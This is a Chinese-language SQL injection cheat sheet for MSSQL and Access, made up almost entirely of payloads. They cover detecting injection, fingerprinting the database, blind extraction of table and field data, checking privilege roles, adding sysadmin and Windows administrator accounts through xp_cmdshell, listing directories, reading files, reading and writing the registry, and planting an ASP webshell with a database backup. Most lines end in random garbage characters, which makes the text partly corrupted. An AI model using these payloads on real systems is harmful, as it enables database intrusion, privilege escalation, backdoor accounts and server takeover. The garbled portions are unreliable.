1.判断是否有注入;and 1=1 ;and 1=2 z&6Tdw�h�V
2.初步判断是否是mssql ;and user>0 :$�`"M#vMX
�BW�bM$@'x
3.注入参数是字符'and [查询条件] and ''=' N��!�fTt,�
1qw*mV;W)_
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �]i3 ��1@O
�3',|HA /x
5.判断数据库系统 }BpCa�6SAs
lUR7zrwJ]o
;and (select count(*) from sysobjects)>0 mssql q�D�Q$Zq�[
R0n#��FL^E
;and (select count(*) from msysobjects)>0 access 8p?Fql}F�[
%z(n�Z%,Z�
-}B&>�w�,5
k8}*b&+{vz
6.猜数据库 ;and (select Count(*) from [数据库名])>0 g)��<t=�+a
L�wg@*�:`d
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 0�k�oC;(<n
Myj 6�8_wf
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 7>�a-`"`O�
Ri�}n0�}I�
9.(1)猜字段的ascii值(access) $LL�y#h?V]
>^8=_i �!�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 =c-,u�W11[
1?6��;O�c^
(2)猜字段的ascii值(mssql) [HKT�XF{�n
�f\ wP�}c'
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 <4gT8�kQ$x
^��b{�w\HZ
10.测试权限结构(mssql) Wn(pz)+�Y�
4&Q.6��HkL
O;�u&>�BMk
~�"E@�do("
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- yX}�riXe��
�}4!�R�2c
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 8u,f<XHi"a
E6{|zF/3�'
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 5A�WI��k,[
0$���-N��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- cMC�Ga�aLU
poq�coSL"}
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- r.5}�Q��?�
_`/:�g�kZS
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 'nOc_b�0�
ltKUpRE\�?
;and 1=(select IS_MEMBER('db_owner'));-- gg�>�O:np8
D�A5kox&cU
Z�\{"/( Hi
�Ut��;,�Z�
11.添加mssql和系统的帐户 "��.9�b}�}
nMK��,g>wp
;exec master.dbo.sp_addlogin username;-- �HMQi:s7%�
;exec master.dbo.sp_password null,username,password;-- q�1Ja��*=r
?h;Zdv>`xz
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ~bp^Q�|
wM
(RP��"VEVR
;exec master.dbo.xp_cmdshell 'net user username password _E[�zY�So`
pNN�6P�sLt
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- n5Ad@B�g��
[MmOPm}@�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �kx�J! #%w
d]JiJg�fa%
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- %����1u�Y�
hrp�ql�_9.
#���S57�SD
=F�q"l�q %
12.(1)遍历目录 "�t4$�%7L]
k��^
CFu�
;create table dirs(paths varchar(100), id int) �eI�z�T(3(
v��Z�Hm'
;insert dirs exec master.dbo.xp_dirtree 'c:\' de?Bn+mvi.
�]]\\Y��|0
;and (select top 1 paths from dirs)>0 :27GqY,3sK
5�",@!1j�u
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 8Bvc#�+�B�
iWbrX�1
I+
[NE��:�$�@
_S4��3_hW�
(2)遍历目录 �_b+=q:$/�
�j���Y>BU&
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �sx�;7���
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 G�@Z,Hbgm�
N`Fg�jn�Q`
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "XWrd�[�Df
CNC�W�x��u
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ;�VY0D�Ap{
n%o"���n?e
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 eIEr\X4\~~
F;Q8^C0e*c
xn4���9[T
3cuVyf�<v�
13.mssql中的存储过程 q[l!kC+Eh�
N�r\[|�||%
xp_regenumvalues 注册表根键, 子键 YQb43�Sh�`
;n�aD`�([
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _�lr���C�f
>wiW(Ki��}
xp_regread 根键,子键,键值名 �A�
%iZ_h^
5��&�W��YL
;exec xp_regread ).[�Mnt/Ft
~J}{'l1{yf
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Ww9%6 #i�t
�&�,pL3Qos
xp_regwrite 根键,子键, 值名, 值类型, 值 KLpe!�8tAe
�Xx~�za{�p
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 F�OB9J�.w4
��D�$W&6'
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �2��6yjQ�
H�1�`}3}"�
xp_regdeletevalue 根键,子键,值名 otQulL)T/�
;A�~efC�^<
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Tw|�c�g�B
ai7*</l��s
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �Ob:}@�j�j
�N/ �7Q�(^
E�1(2wJ-3"
KkVFY�+/�)
14.mssql的backup创建webshell N"X;aV�Fs_
?[��n��{M
use model }bQq��ln)#
ku=o$�I8K
create table cmd(str image); J7FCW^-`�3
~��)�';[Ha
insert into cmd(str) values (''); 5l�"/�l�Gw
W`}C0[%�VW
backup database model to disk='c:\l.asp'; @D<�q��=:k
�mJB�vhK9%
s6�8&AB���
%E\&���9,�
15.mssql内置函数 L�0\��97AF
0�G-M.s}A
;and (select @@version)>0 获得Windows的版本号 J��x#�r��
`�Zn2V��x�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��[�D�[&aA
�Z�^AOV:|m
;and (select user_name())>0 爆当前系统的连接用户 �q.��s�2x0
~f/n�q/8�
;and (select db_name())>0 得到当前连接的数据库 cVH�v>nd�#
=.�q
Zgcg�
$i��s|B9�B
JZQ��T��}�
16.简洁的webshell Rj�&V�~or�
�g. V6:>�,
use model ���)sW�C5\
fv1pA+�zN[
create table cmd(str image); rQ0V3x1"Qx
*�XRA�M��.
insert into cmd(str) values (''); K!|%mI8�gk
w�B��(A['k
backup database model to disk='g:\wwwtest\l.asp';
